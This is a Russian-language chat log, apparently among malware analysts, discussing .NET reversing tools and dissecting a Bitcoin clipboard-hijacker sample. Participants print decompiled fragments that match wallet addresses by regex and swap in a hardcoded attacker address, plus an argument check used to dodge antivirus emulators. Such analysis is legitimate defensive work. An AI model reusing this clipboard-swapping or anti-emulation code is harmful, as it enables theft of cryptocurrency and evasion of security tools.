bilka00
если уж нужно
А ведь ещё недавно про вири на дот.нет шутки были...
bilka00
а тут файл на дотнете...
bilka00
bilka00
Такое даже реверсить скучно
bilka00
ибо реверсить его не нужно
bilka00
просто в декомпилере открыть
KosBeg
Мде
KosBeg
давно уже 😅
bilka00
SimpleAssemblyExplorer
bilka00
Ну так блин:)
KosBeg
я рефлектор юзаю
KosBeg
и IlSpy и рефлектор, удобно наверное
bilka00
Ну я дотнет собстна только им или dnSpy
bilka00
Но чесно говоря я стараюсь с таким говном не связываться
bilka00
не люблю хуи глотать
KosBeg
de4dot+рефлектор
вот такой набор я юзаю
bilka00
de4dot далеко не со всем справляеться так то
bilka00
не буду утверждать но ко мне такие файлы попадают из завидною регулярностю
KosBeg
а SimpleAssemblyExplorer лучше всё делает?
KosBeg
у меня какой-то мод de4dot
KosBeg
местами берёт лучше чем оригинал, местами хуже
bilka00
но иногда анализить им удобней имхо
bilka00
Да и в плане защит чесно говоря мой предел это de4dot или поотлаживать попорообвать
bilka00
если нет я просто файл кидаю знакомому который его разложит по опкодикам независимо от защиты
KosBeg
мне бы такого знакомого 😅
bilka00
Ну актуально это только для дотнета ^_^
bilka00
потому что он пэдар
KosBeg
я понял что только для дотнета.
а чё пэдар? потому что только с дотнетом работает?
bilka00
да
bilka00
:)
Anonymous
билд апрельский, всего 2 ав https://virustotal.com/ru/file/ca09b814a3d4d2f4fc4d61dc7505a8c142cfc1efa404365a968376f668ae0f73/analysis/
Anonymous
if (!object.Equals(((Match)enumerator.Current).Value, "16gvYsbR3XJRa00nUQunB1ar8fLkEKMMDs"))
{
string buf_local = regex.Replace(bf, "16gvYsbR3XJRa00nUQunB1ar8fLkEKMMDs");
Program.invokerControl.Invoke(new Action(delegate
{
Clipboard.SetDataObject(buf_local);
}));
Anonymous
Compilation timestamp 2017-04-23 09:09:39
Anonymous
такой кошелек блокчейн не находит
Anonymous
Oops! We couldn’t find what you are looking for.
Unrecognized search pattern. Please try searching for a transaction by entering a block height, address, block hash, transaction hash, hash 160 or ipv4 address. Or select from the general topics below.
bilka00
ну значит не блокчейн
bilka00
как бы похер что
bilka00
факт что подменяет чот в буфере
Anonymous
и не палится уже 3 месяца
Anonymous
значит всем похер
bilka00
Думаю к этому привело вот то подобие антиэмуляции
bilka00
ибо обычно даже автозагрузка уже палиться
Anonymous
какое подобие антиэмуляции?
bilka00
посмотри main()
bilka00
увидишь
Anonymous
if (args[0] == "0x1" && !Program._a())
{
Program._b();
}
bilka00
вот да типа это
Anonymous
это какое-то условие для создания автозагрузки
Anonymous
дальше там идёт создание потока который подменяет кошелёк
Anonymous
new Thread(new ThreadStart(Program.func)).Start();
Anonymous
private static void func()
{
Regex regex = new Regex("[13][a-km-zA-HJ-NP-Z0-9]{26,33}", RegexOptions.IgnoreCase);
Anonymous
func исполняет подмену
Anonymous
зачем вообще это эмулировать, бери и пали, прямо по кошельку, самый тупой способ
bilka00
это какое-то условие для создания автозагрузки
ну вот оно отлично работает и для антиэмулиации:)
Anonymous
а от хипса работает?
bilka00
Ну хз знаю только что оно отлично обламаем любой антивирусный эмуль
Anonymous
где этот семпл попался?
bilka00
ну вот от этого мисье я так понимаю
bilka00
жертва дизассемблера
bilka00
кто любит проги в песочнице?
bilka00
можешь проанализоровать что за бомба эхэ
bilka00
или не то(
bilka00
хз
bilka00
выше далог почитай это не тот файл
bilka00
ну да
bilka00
это второй
bilka00
первый сейчас буду смотреть
bilka00
хехе тут статик анализом не оботись нужно виртуалку подымать
bilka00
потому откажусь ибо у меня игруля улетит если виртуалку поднять
Anonymous
ща запущу
Anonymous
наверно буткит судя по названию и строкам
bilka00
Тогда еще на hybrid analis залей по дорожке ^_^
bilka00
больно много инфы важной